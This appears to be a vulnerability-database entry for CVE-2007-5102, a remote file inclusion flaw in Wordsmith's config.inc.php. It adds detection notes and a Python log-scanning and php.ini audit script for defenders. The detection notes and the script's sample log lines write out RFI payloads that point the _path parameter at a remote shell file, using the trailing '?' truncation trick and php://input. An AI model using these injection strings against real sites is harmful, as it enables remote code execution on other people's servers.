CVE-2007-5102
Published: 2007-09-26
Priority P3 · 44 · medium · CVSS 2.0 base score 6.8
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Exploit: public exploit available (Exploit-DB 4446)
EPSS: 38.56% (98.4th percentile)
PHP remote file inclusion vulnerability in config.inc.php in Wordsmith 1.0 RC1, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the _path parameter.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wordsmith | wordsmith | — | — |
Detection & IOCs (extracted from sources)
- Monitor HTTP requests targeting config.inc.php that carry a URL-valued '_path' parameter; that parameter is the RFI injection point.
- The public exploit appends a '?' after the remote shell URL so that any path suffix the script concatenates onto '_path' becomes a query string sent to the attacker's server instead of breaking the URL (e.g. ?_path=http://shell.txt?). Detect GET requests to config.inc.php whose '_path' value contains 'http://' or 'https://'.
- Exploitation requires register_globals to be enabled on the target PHP installation; installations running with register_globals=Off are not affected. Audit PHP configurations for register_globals=On as a prerequisite indicator.
- The exploit title references version 1.1b while the NVD entry specifies 1.0 RC1; detections should cover both version strings.
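The detection points above, turned into runnable logic. This is an added example for this page, not code from the Wordsmith project or from any of the linked advisories: the log lines and php.ini fragment are constructed, and the check goes beyond the sources' http:// and https:// by also flagging the other PHP stream wrappers (ftp, ftps, data, php://) that include() will fetch from when remote includes are permitted.

```python
"""Detection helpers for the RFI pattern behind CVE-2007-5102.

Added example for this page, not code from the Wordsmith project or from any
of the linked advisories. The sample log lines and php.ini fragment below are
constructed, not real captures.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Pulls the request line out of an Apache/nginx "combined"-style log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

TARGET_SCRIPT = "config.inc.php"
PARAM = "_path"

# The page's sources name http:// and https:// only. The other entries are PHP
# stream wrappers include() also fetches from when remote includes are allowed,
# so the check generalises to them (an assumption beyond the page).
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps", "data", "php"}


def rfi_indicators(log_line):
    """Return a dict describing an RFI attempt in one log line, or None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.lower().endswith(TARGET_SCRIPT):
        return None
    # keep_blank_values so "?_path=" with an empty value is still iterated
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name != PARAM:
            continue
        # parse_qsl already decoded once; decode again to catch double-encoding
        decoded = unquote(value).strip()
        head, sep, _ = decoded.partition(":")
        scheme = head.lower() if sep else ""
        if scheme not in REMOTE_SCHEMES:
            continue
        return {
            "method": m.group("method"),
            "value": decoded,
            "scheme": scheme,
            # A trailing '?' turns whatever the script appends into a query
            # string for the attacker's server; a NUL byte (%00, decoded above)
            # was the other truncation trick of that PHP era.
            "suffix_neutralised": decoded.endswith("?") or decoded.endswith("\x00"),
        }
    return None


def scan(lines):
    """Return (line_index, indicators) for every line that looks like an RFI attempt."""
    hits = []
    for i, line in enumerate(lines):
        found = rfi_indicators(line)
        if found:
            hits.append((i, found))
    return hits


def php_ini_exposure(ini_text, php_before_5_2=False):
    """Report the php.ini directives that make this bug reachable.

    register_globals=On is the prerequisite the advisory names. Remote include()
    is additionally gated by allow_url_include (PHP >= 5.2) or, on older PHP
    releases that lacked that directive, by allow_url_fopen.
    """
    settings = {}
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()  # drop ';' comments
        if "=" not in line:
            continue
        key, _, val = line.partition("=")
        settings[key.strip().lower()] = val.strip().strip('"').lower()

    def on(key):
        return settings.get(key) in {"on", "1", "true", "yes"}

    remote = on("allow_url_fopen") if php_before_5_2 else on("allow_url_include")
    return {
        "register_globals": on("register_globals"),
        "allow_url_include": on("allow_url_include"),
        "allow_url_fopen": on("allow_url_fopen"),
        "rfi_reachable": on("register_globals") and remote,
    }


# Constructed sample access-log lines (not real captures).
SAMPLE_LOG = [
    '203.0.113.5 - - [26/Sep/2007:10:01:02 +0000] "GET /wordsmith/config.inc.php?_path=http://203.0.113.9/shell.txt? HTTP/1.1" 200 512',
    '203.0.113.5 - - [26/Sep/2007:10:01:09 +0000] "GET /wordsmith/config.inc.php?_path=HTTPS%3A%2F%2F203.0.113.9%2Fs.txt%3F HTTP/1.1" 200 512',
    '198.51.100.7 - - [26/Sep/2007:10:02:00 +0000] "GET /wordsmith/index.php?page=home HTTP/1.1" 200 4096',
    '198.51.100.7 - - [26/Sep/2007:10:02:11 +0000] "GET /wordsmith/config.inc.php?_path=../themes/default HTTP/1.1" 200 512',
    '203.0.113.5 - - [26/Sep/2007:10:03:00 +0000] "GET /wordsmith/config.inc.php?_path=php://input HTTP/1.1" 200 512',
]

# Constructed php.ini fragment: register_globals on, remote include off on 5.2+.
SAMPLE_INI = """\
; constructed php.ini fragment
[PHP]
register_globals = On
allow_url_fopen = On
allow_url_include = Off
"""

if __name__ == "__main__":
    for idx, hit in scan(SAMPLE_LOG):
        print(f"line {idx}: {hit}")
    print(php_ini_exposure(SAMPLE_INI))
```

Run on the constructed lines, lines 0, 1 and 4 are flagged (the relative-path value on line 3 is not), and the php.ini audit reports register_globals=On but rfi_reachable only when the host is treated as pre-5.2 PHP, where allow_url_fopen alone governed remote include().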
No detection rules found.
No writeups or analysis indexed.
References
- http://osvdb.org/37223
- http://secunia.com/advisories/26924
- http://www.vupen.com/english/advisories/2007/3251
- https://exchange.xforce.ibmcloud.com/vulnerabilities/36746
- https://www.exploit-db.com/exploits/4446